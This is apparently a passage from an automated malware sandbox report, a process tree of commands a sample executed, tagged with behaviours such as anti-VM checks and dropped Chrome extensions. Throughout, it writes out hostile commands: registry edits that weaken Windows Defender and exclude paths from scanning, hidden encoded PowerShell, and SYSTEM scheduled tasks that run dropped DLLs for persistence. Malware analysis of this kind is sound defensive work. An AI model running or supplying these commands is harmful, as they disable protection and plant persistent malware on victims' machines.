C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\HwnzDfNzNWHpPtLDwZR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\HwnzDfNzNWHpPtLDwZR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ecOJmsgAHWlsC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ecOJmsgAHWlsC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\epoBtGYzqLvU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\epoBtGYzqLvU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\qIYKRzUEasUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\qIYKRzUEasUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\zgoZGMcaU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\zgoZGMcaU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\pICeQFkDCDDquYVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\pICeQFkDCDDquYVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v 
\"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\rhuXFflbMyLRQZzPf\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\rhuXFflbMyLRQZzPf\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\nlcUipsDcFbdntMB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\nlcUipsDcFbdntMB\" /t REG_DWORD /d 0 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\HwnzDfNzNWHpPtLDwZR" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\HwnzDfNzNWHpPtLDwZR" /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\HwnzDfNzNWHpPtLDwZR" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ecOJmsgAHWlsC" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ecOJmsgAHWlsC" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\epoBtGYzqLvU2" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\epoBtGYzqLvU2" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qIYKRzUEasUn" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qIYKRzUEasUn" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\zgoZGMcaU" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\zgoZGMcaU" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\pICeQFkDCDDquYVB /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\pICeQFkDCDDquYVB /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\rhuXFflbMyLRQZzPf /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\rhuXFflbMyLRQZzPf /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\nlcUipsDcFbdntMB /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\nlcUipsDcFbdntMB /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "ghtgCwFBD" /SC once /ST 02:01:25 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "ghtgCwFBD"2⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "ghtgCwFBD"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "yfARWRprRqUFWeTGf" /SC once /ST 03:46:49 /RU "SYSTEM" /TR "\"C:\Windows\Temp\nlcUipsDcFbdntMB\LDIxkfUBXQlUStg\gfswPFz.exe\" aV /DMSkdidQv 385118 /S" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "yfARWRprRqUFWeTGf"2⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 5876 -ip 58761⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
C:\Windows\windefender.exeC:\Windows\windefender.exe1⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
-
C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exeC:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Windows\Temp\nlcUipsDcFbdntMB\LDIxkfUBXQlUStg\gfswPFz.exeC:\Windows\Temp\nlcUipsDcFbdntMB\LDIxkfUBXQlUStg\gfswPFz.exe aV /DMSkdidQv 385118 /S1⤵
- Checks computer location settings
- Executes dropped EXE
- Drops Chrome extension
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"2⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"3⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 64⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 65⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"3⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 64⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 65⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"3⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 64⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 65⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"3⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 64⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 65⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"3⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell start-process -WindowStyle Hidden gpupdate.exe /force4⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell start-process -WindowStyle Hidden gpupdate.exe /force5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force6⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "biPxHmULFllsbMgnpt"2⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" &2⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"3⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True4⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True6⤵
- C:\Windows\SysWOW64\schtasks.exe (level 2)
  schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\zgoZGMcaU\MJlIBK.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "JHJXtPPPvDXVqpH" /V1 /F
  - Drops file in Windows directory
  - Creates scheduled task(s)
- C:\Windows\System32\Conhost.exe (level 3)
  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
- C:\Windows\SysWOW64\schtasks.exe (level 2)
  schtasks /CREATE /TN "JHJXtPPPvDXVqpH2" /F /xml "C:\Program Files (x86)\zgoZGMcaU\XjFVZlb.xml" /RU "SYSTEM"
  - Creates scheduled task(s)
- C:\Windows\SysWOW64\schtasks.exe (level 2)
  schtasks /END /TN "JHJXtPPPvDXVqpH"
- C:\Windows\SysWOW64\schtasks.exe (level 2)
  schtasks /DELETE /F /TN "JHJXtPPPvDXVqpH"
- C:\Windows\SysWOW64\schtasks.exe (level 2)
  schtasks /CREATE /TN "HtmGfIeJlxktuW" /F /xml "C:\Program Files (x86)\epoBtGYzqLvU2\NNpirKV.xml" /RU "SYSTEM"
  - Creates scheduled task(s)
- C:\Windows\System32\Conhost.exe (level 3)
  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
- C:\Windows\SysWOW64\schtasks.exe (level 2)
  schtasks /CREATE /TN "beuYBzgGTLbmn2" /F /xml "C:\ProgramData\pICeQFkDCDDquYVB\ROnwOoo.xml" /RU "SYSTEM"
  - Creates scheduled task(s)
- C:\Windows\SysWOW64\schtasks.exe (level 2)
  schtasks /CREATE /TN "ykYfCTTujiceFdOqI2" /F /xml "C:\Program Files (x86)\HwnzDfNzNWHpPtLDwZR\qYUJOOH.xml" /RU "SYSTEM"
  - Creates scheduled task(s)
- C:\Windows\SysWOW64\schtasks.exe (level 2)
  schtasks /CREATE /TN "fWcEirOkMoMQjrUKaey2" /F /xml "C:\Program Files (x86)\ecOJmsgAHWlsC\zInvEZW.xml" /RU "SYSTEM"
  - Creates scheduled task(s)
- C:\Windows\SysWOW64\schtasks.exe (level 2)
  schtasks /CREATE /TN "aNyMQclguOCSCcjxm" /SC once /ST 03:05:18 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\nlcUipsDcFbdntMB\jaXiotkM\TMeXSNs.dll\",#1 /Podidwg 385118" /V1 /F
  - Drops file in Windows directory
  - Creates scheduled task(s)
- C:\Windows\SysWOW64\schtasks.exe (level 2)
  schtasks /run /I /tn "aNyMQclguOCSCcjxm"
- C:\Windows\SysWOW64\schtasks.exe (level 2)
  schtasks /CREATE /TN "WHKNq1" /SC once /ST 04:26:59 /F /RU "Admin" /TR "\"C:\Program Files\Google\Chrome\Application\chrome.exe\" --restore-last-session"
  - Creates scheduled task(s)
- C:\Windows\SysWOW64\schtasks.exe (level 2)
  schtasks /run /I /tn "WHKNq1"
- C:\Windows\SysWOW64\schtasks.exe (level 2)
  schtasks /DELETE /F /TN "WHKNq1"
- C:\Windows\SysWOW64\schtasks.exe (level 2)
  schtasks /DELETE /F /TN "yfARWRprRqUFWeTGf"
- C:\Users\Admin\AppData\Roaming\explorer.exe (level 1)
  C:\Users\Admin\AppData\Roaming\explorer.exe
  - Executes dropped EXE
- C:\Windows\system32\rundll32.EXE (level 1)
  C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\nlcUipsDcFbdntMB\jaXiotkM\TMeXSNs.dll",#1 /Podidwg 385118
- C:\Windows\SysWOW64\rundll32.exe (level 2)
  C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\nlcUipsDcFbdntMB\jaXiotkM\TMeXSNs.dll",#1 /Podidwg 385118
  - Checks BIOS information in registry
  - Loads dropped DLL
  - Enumerates system info in registry
- C:\Windows\SysWOW64\schtasks.exe (level 3)
